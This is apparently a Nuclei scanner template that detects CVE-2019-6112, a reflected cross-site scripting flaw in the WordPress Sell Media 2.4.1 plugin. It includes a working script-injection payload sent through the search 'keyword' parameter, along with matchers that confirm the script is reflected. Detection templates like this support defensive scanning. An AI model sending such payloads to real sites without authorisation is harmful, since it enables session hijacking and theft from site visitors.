nuclei-templates/http/cves/2019/CVE-2019-6112.yaml

48 lines
2.1 KiB
YAML

id: CVE-2019-6112
info:
name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
- https://nvd.nist.gov/vuln/detail/CVE-2019-6112
- https://metamorfosec.com/Files/Advisories/METS-2020-001-A_XSS_Vulnerability_in_Sell_Media_Plugin_v2.4.1_for_WordPress.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-6112
cwe-id: CWE-79
epss-score: 0.00126
epss-percentile: 0.46868
cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: graphpaperpress
product: sell_media
framework: wordpress
tags: cve,cve2019,wordpress,wp-plugin,xss,graphpaperpress
http:
- method: GET
path:
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
- "alert(1337)"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008c4db7d7c65d912c994092f7040ac6a713397c1d45d89b664619458c4bebae60022056cbd7385832d88136c72480599adf3c4aee4f573ec450a2695cdd3190ed738f:922c64590222798bb761d5b6d8e72950